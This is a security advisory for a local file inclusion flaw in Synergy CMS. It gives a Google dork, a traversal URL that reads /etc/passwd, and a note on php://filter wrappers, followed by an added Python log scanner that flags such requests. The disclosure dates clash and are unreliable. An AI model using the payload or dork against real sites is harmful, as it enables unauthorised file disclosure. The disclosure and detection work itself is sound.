##################################################
Synergy CMS LFI vulnerability
##################################################

*# Product: Synergy CMS
*# Vulnerability: Post-authentication local file inclusion
*# Impact: Medium/Limited
*# Authors: Jan Hodermarsky and Lukas Andruska
*# Vendor Homepage: http://www.s-e.lt
*# Affected versions: <= 2.0
*# Tested on: Mozilla Firefox 36
*# Google Dork: intext:"Svetainių kūrimas: "Synergy Effect"

[05/01/2015] - Vulnerabilities discovered
[07/01/2011] - Issues reported to the vendor [www.s-e.lt]
[12/01/2012] - Public disclosure

*# Exploit

domain.com/index.php?admin=1&body=../../../../../etc/passwd

If there is no security measure in place, such as open_basedir, any local file on the server can be loaded:

http://domain.com/index.php?admin=1&body=../../../../../etc/passwd

If allow_url_fopen or allow_url_include is enabled on the server, PHP wrappers (e.g. php://filter) can be used to view the source code of files that use the Smarty framework. Loading files that use the Smarty framework (like ../includes/get.php) directly, without a wrapper, causes a PHP error.

===========================================[End]=============================================
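
Added example, not part of the original advisory and not vendor code: a log check that flags index.php requests whose body parameter carries a traversal sequence, an absolute path or a stream wrapper, the patterns described above. The combined-log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2015:10:01:02 +0000] "GET /index.php?admin=1&body=pages HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jan/2015:10:01:09 +0000] "GET /index.php?admin=1&body=../../../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.9 - - [10/Jan/2015:10:02:30 +0000] "GET /index.php?admin=1&body=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843
203.0.113.9 - - [10/Jan/2015:10:03:11 +0000] "GET /index.php?admin=1&body=php://filter/CONSTRUCTED HTTP/1.1" 200 9012
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def normalise(value, rounds=3):
    """Percent-decode repeatedly so encoded forms are compared like plain ones."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def classify_body(value):
    """Return the reasons a `body` value looks like a file-inclusion attempt."""
    v = normalise(value)
    reasons = []
    if ".." in v.split("/"):          # a ".." path segment, e.g. ../../etc/passwd
        reasons.append("path-traversal")
    if v.startswith("/"):             # absolute filesystem path
        reasons.append("absolute-path")
    if WRAPPER_RE.match(v):           # scheme prefix such as php://
        reasons.append("stream-wrapper")
    return reasons

def scan(log_text):
    """Return (ip, status, reasons, body value) for each suspicious index.php request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        if url is None or not url.path.endswith("/index.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("body", []):
            reasons = classify_body(value)
            if reasons:
                hits.append((m["ip"], int(m["status"]), reasons, value))
    return hits
```

Calling scan(SAMPLE_LOG) returns three hits; a 200 status on a flagged request is the case to review first, since it suggests the include succeeded.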